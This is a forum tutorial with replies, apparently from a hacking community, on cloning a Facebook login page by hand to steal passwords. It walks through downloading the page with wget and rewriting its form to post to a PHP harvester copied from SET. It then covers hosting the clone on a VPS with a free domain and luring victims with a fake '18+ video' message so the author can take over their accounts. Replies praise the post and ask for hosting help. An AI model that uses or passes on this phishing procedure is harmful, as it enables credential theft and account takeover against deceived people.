Clone Login Forms Manually to Capture Credientials

SET is great when you have a short space of time at hand, however sometimes you want to know whats actually going on under the hood or have found a site you can’t clone with SET.

Step 1: Select Your Target!

The First Thing You’re Going to Want to Do Is Select the Site Login You Wish to Clone! For This Tutorial I Will Be Using Facebook, However This Can Be Whatever You Like. Some Sites Use Some Javascript Obfuscation Magic to Hide the Input Elements (Like the login.live.com Page). But Most Major Sites Use the Traditional Input Element Method.
###Step 2: Use Wget to Download the Login Page

Now You Have Your Site in Mind, You Will Need to Download the Login Page. This Can Be Done with Wget.

wget -U “Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0” https://www.facebook.com/ -O facebook.html

Wget is the command used to download files.

-U means custom useragent, if we leave this out many sites will redirect us to other custom sites as Wget isn’t a browser!

-O means we save the file with a custom name.

Step 3: Modify the Exisiting Page Source.

This is where you will get your hands dirty, can be a little confusing at times, however is probably one of the most important steps. You will need to locate the form located on the page. My main editor is vim/atom, but I will be using atom for this tutorial. Open the facebook.html or file you downloaded with your editor and locate the form tag with a search.

With a simple search I was able to locate the form, you will need to modify this to post to a custom PHP script. Our PHP script is called post.php, and is located in the same directory as our login html. So change the tag to say. and delete the rest of the items in the between the first and second square angled brackets <>.

###Step 4: Write/Download a Credential Harvester.

So now, when you go to the page, click login, it will attempt to post the details entered to your post.php script… Which doesn’t exist yet. You need to either write one or download one. I stole the one from SET and it works great. I have modifed it a little too. You can get this script from this fancy looking link or steal it from SET somewhere.

Step 5: Do Some Server Magic!

Hopefully, you have a server with PHP and the like installed. Kali itself comes with Apache pre-installed and the directory is at /var/www/.

If you’re like me, you use a hosted VPS. If you want one, you can upload a Kali ISO to it to make social engineering engagements more convincing and easier. I personally use a VPS hosting provider called Vultr, and you can get $5 free credit if you use this link, which is easily enough for a quick engagement. You can also register a free-domain at freenom.com. This is great if you don’t exactly want to spend a lot of money but just want to try it all out.

Anyway… Once you’ve uploaded the files to a server, you may find you can enter your details to the page, and be re-directed, but no harvest files are created. To fix this, use chown to change the permissions of the folder.

chown -R www-data:www-data /var/www

This fixes most problems for me!

Step 6: Social Engineer!

Now you will need to “get creative!”. Send the target an email or a message with something compelling on the other side that requires them to login. My common pretext is telling somebody about an extremely funny video that is 18+ rated, and they will need to re-login in order to watch it, I then edited the post.php to redirect to a funny video. By the time they’ve finished laughing, you are already in their account.

Hopefully this is of help to you people! I learnt how do this by playing with it, and looking at what SET did, and it helped me to understand it all better :slight_smile:

pry0cc

11 Likes

Well written! I have a couple questions mainly about the server/hosting process:

What do you mean by “Hopefully, you have a server with PHP and the like installed”, and what do I do with the pre-installed Apache directory (/var/www/)?

1 Like

good tut pry0cc. Might have to try this out!

1 Like

Thanks! :wink:

To serve up the cloned site, you need a server to host the content, otherwise nobody will be able to see it. Therefore you need to put the cloned & modified html page, set it to index.html, and put the post.php script in there as well.

Thanks, I think I need to do some more reading about server hosting and especially Apache.

I perhaps could do some tutorials? Would that be good?

Very good and interesting article. Keep it up!

Thanks man! I wrote this a while ago!

This topic was automatically closed after 30 days. New replies are no longer allowed.